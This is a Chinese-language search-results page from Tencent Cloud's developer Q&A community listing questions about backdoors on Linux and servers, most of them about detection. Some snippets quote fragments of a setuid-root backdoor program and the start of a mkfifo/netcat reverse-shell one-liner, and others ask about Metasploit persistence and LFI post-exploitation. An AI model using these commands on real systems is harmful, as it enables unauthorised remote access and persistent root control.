腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
您将使用哪些功能来
检测
后门
或机器人安装?
、
、
、
、
本文件讨论了统计分析和机器学习技术,以
检测
一些攻击场景。例如,如果您希望
检测
到可能的Brute Force登录,您可能需要查看以下特性: 防火墙接受,多个失败登录在一个行,至少一个成功登录。我有一个用例,我感兴趣的是
检测
攻击,试图下载和安装
后门
。我从IDS、防火墙、HTTP服务器和Syslog服务器收集了日志。我想找到一些指示性的功能,我可以提供给我的机器学习模型。这是否意味着
后门
很难被安全设备发现?如果我想使用其他功能,如蛮力示例所示,以自动化的方式
检测
后门
,您会提出
浏览 0
提问于2019-02-21
得票数 2
1
回答
斯基拉,
后门
错误,倍频程冲突
、
、
、
我从scilab.6.0.0网站安装了scilab.6.0.0和
后门
(我在Application>Module maneger>atom>Technical上找不到)。我移动了
后门
文件我的家,从scilab命令行我安装了它。-->atomsInstall('/home/user/BackDoor_0.2_5.5.bin.x86_64.
linux
.tar.gz') 尽管它成功地安装了
后门
,但是当我重新启动scilab时,我收到了这个
后门</em
浏览 12
提问于2017-05-30
得票数 1
回答已采纳
1
回答
如何通过命令行手动
检测
和删除
linux
系统中的
Linux
.BackDoor.FakeFile.1?
、
根据Dr.web的说法,有一种名为
Linux
.BackDoor.FakeFile.1的新
linux
恶意软件,它可以穿透.pdf、gedit、开放办公室文件。例如,如果
Linux
.BackDoor.FakeFile.1的ELF文件名为AnyName.pdf,则特洛伊木马将搜索名为.AnyName.pdf的隐藏文件,然后使用命令mv替换原始文件。由于恶意软件最近被添加到Dr.Web病毒数据库中(在2016-10-14年添加),通过命令行
检测
和删除
后门
是否有可能验证
linux
系统?
浏览 0
提问于2016-10-28
得票数 0
回答已采纳
2
回答
在企业环境中使用Kali
Linux
安全吗?
、
Kali
Linux
是否包含经过审核的软件,该软件旨在帮助安全性,并且基本上不包含任何
后门
?Kali
Linux
有一些
后门
的历史吗?还是允许第三方访问经过审计的系统?
浏览 0
提问于2016-10-27
得票数 0
回答已采纳
1
回答
恶意软件和
后门
检测
外壳脚本
、
、
我正在尝试构建一个shell脚本,它可以自动
检测
恶意软件、
后门
和rootkit,我也在对它进行研究。我发现了一些东西 find .谁能帮我给出一个大致的想法,我可以使用的脚本,以便它可以做的工作,恶意软件,
后门
和rootkit
检测
。更确切地说,如何在ubuntu系统上找到这些恶意软件、
后门
和rootkit。谢谢。
浏览 0
提问于2013-07-29
得票数 5
回答已采纳
1
回答
软件
后门
的风险
从肯·汤普森的图灵奖演讲“信任思考”开始,软件
后门
的风险就很明显了。当然,这也适用于硬件。 限制我们在这里的软件,什么是真正好的解决方案,以防止
后门
?由于最近媒体关于国家对全球互联网监控的某些报道,人们对注定要保护IT安全的软件中潜在
后门
的担忧再次浮出水面,例如在http://www.golem.de/news/prism-skandal-furcht-vor-hintertueren-in-us-software-und-hardware
浏览 0
提问于2013-07-03
得票数 0
1
回答
使用windows内置组件(可能还有TeraTerm和perl )来模拟netcat的raw连接模式
、
、
因此,我正在努力让windows的性能更像我们的
Linux
机器所能做到的。echo "--help" | nc servername portnum 是否可以仅使用Windows7、TeraTerm和Perl的内置功能在NetCat被许多视窗反病毒程序
检测
为恶意软件(
后门
代理),因此将其放入共享目录将不起作用。
浏览 0
提问于2013-01-11
得票数 0
回答已采纳
2
回答
后门
怎么走?
、
、
、
我研究了一下,我感到惊讶的是,在我扎根之后,把一台
Linux
机器
后门
是多么容易。0,0,0);}chown root:root backdoor因此,现在,任何用户都可以使用
后门
作为/backdoor whoami在获得root等效(NT AUTHORITY\SYSTEM)之后,我如
浏览 0
提问于2022-11-09
得票数 -1
1
回答
我应该在C和GTK+中使用线程来为
后门
创建图形用户界面控制器吗?
、
、
、
、
场景: 我用C语言为
Linux
编写了一个CLI
后门
和一个CLI控制器。我正在使用Glade和GTK+3为控制器创建一个图形用户界面。我希望控制器(基本上是一个具有反向功能的服务器)始终接受来自
后门
(具有反向功能的客户端)的连接。同时,我希望将控制器中TextBuffer小部件上编写的命令发送到
后门
,并将接收到的输出写回
后门
。
浏览 4
提问于2020-06-23
得票数 1
1
回答
对于
Linux
,是否有相当于meterpreter的“运行持久性”?
与问题一样,我如何在
Linux
目标上安装带有Metasploit的持久
后门
?
浏览 0
提问于2015-07-27
得票数 2
3
回答
如果
Linux
允许来自公众的开源贡献,它如何是安全的?
、
、
、
、
根据我对
Linux
的简要了解,来自世界各地的开发人员提交的代码将包含在
Linux
更新中。然后由安全管理员对其进行审查。一旦获得批准,它就会传递给
Linux
的创始人Linus,以获得他的最终批准。由于所有这些代码都是由世界各地不知名的开发人员提交的,安全管理员如何确保没有向操作系统添加任何
后门
脚本?不是有1500万行代码吗?操作系统的管理员是否真的理解每一行代码,并确信人们没有提交可能破坏系统的东西,如恶意软件、
后门
或间谍软件?
浏览 0
提问于2018-05-12
得票数 7
4
回答
Avira Antivirus
检测
到监听功能作为
后门
模式
、
、
函数被avira antivirus
检测
为
后门
模型。 如果没有侦听功能,我如何编写小型客户端/服务器应用程序?
浏览 4
提问于2010-08-05
得票数 3
2
回答
本地文件包含(后期开发)
、
、
我很好奇应该在Windows服务器上查找哪种类型的敏感文件,与
Linux
相比,Windows服务器容易受到LFI的攻击?。我正在寻找可能的利用后的方法,LFI漏洞的网站是托管在Windows服务器上,而不是
Linux
。只是想在不使用外部
后门
或工具( )的情况下,对LFI进行
浏览 0
提问于2019-06-09
得票数 1
1
回答
我看到两个根用户(Ubuntu)
、
我并不是
linux
中最聪明的(这就是为什么我买了一个VPS,所以我可以学习),我以为它是某种
后门
,尽管我宁愿由你们来验证,他们知道我是否应该删除它。这是一个图片:。如果你们能告诉我这是不是
后门
那就太好了,谢谢!
浏览 3
提问于2017-08-15
得票数 0
回答已采纳
2
回答
将文件写入文件夹时记录的程序。
、
我们公司的一台服务器似乎成了php
后门
攻击的受害者。我找到并关闭了几个漏洞,但其中一个似乎仍然存在,那就是将php/webshell
后门
写入我们的C:/windows/temp。似乎很好地
检测
和消除了这种威胁,但问题是,我需要查看文件安全属性,以查看创建这些文件的应用程序池(该服务器上大约有16个不同的站点)。
浏览 0
提问于2012-04-11
得票数 1
回答已采纳
1
回答
英特尔SA00086 / CVE-2017-5712可远程利用吗?
、
、
我意识到,像Windows域管理一样的东西可以作为“远程管理”与本地访问相匹配,但是这如何适用于不允许远程访问根( Admin )的
Linux
系统呢?
浏览 0
提问于2017-11-24
得票数 1
回答已采纳
1
回答
可以借到Netcat的侦听器吗?
、
我一直在使用专门的软件或恶意命令进入备份计算机和服务器,这些命令会在目标计算机上产生
后门
,然后将终端传输到我服务器上的侦听netcat会话。我想知道是否有可能在使用Netcat监听端口的服务器上产生
后门
。最好是
Linux
机器。然后说他在等
后门
在受害者的机器上产卵。受害者会在他的
Linux
机器上运行一些命令,比如: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1
浏览 0
提问于2017-03-14
得票数 1
2
回答
如何在PHP源代码中找到
后门
、
我太惊讶了,我想知道在使用PHP应用程序之前,我应该如何
检测
这些php
后门
。
浏览 4
提问于2012-02-24
得票数 0
3
回答
在
Linux
内核中包含二进制blobs意味着什么?
、
、
知道了这一点,从安全的角度来看,如何才能将二元水泡作为
Linux
内核的一部分来运行呢?存在一个内核的无blob版本。这个项目背后的动机似乎主要是意识形态的。二进制blob是否能包含一个rootkit,用于接管或打开
后门
进入整个系统?怎么能发现这样的
后门
呢?
浏览 0
提问于2013-06-10
得票数 8
回答已采纳
1
回答
如何
检测
软件和硬件缺陷?
、
、
我如何知道一台pc是否有bios的
后门
,以及如何知道是否存在硬件恶意损害?
浏览 0
提问于2020-08-08
得票数 -1
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
Linux后门整理合集
Chaos:Linux后门卷土重来
能逃避杀软检测的 Linux 后门曝光;中国将建立 “不可靠实体清单”
burp trick;Retile:LKM Linux rootkit和后门
后门程序SpeakUp来袭 6版Linux系统受波及
热门
标签
更多标签
云服务器
ICP备案
对象存储
实时音视频
即时通信 IM
活动推荐
运营活动
广告
关闭
领券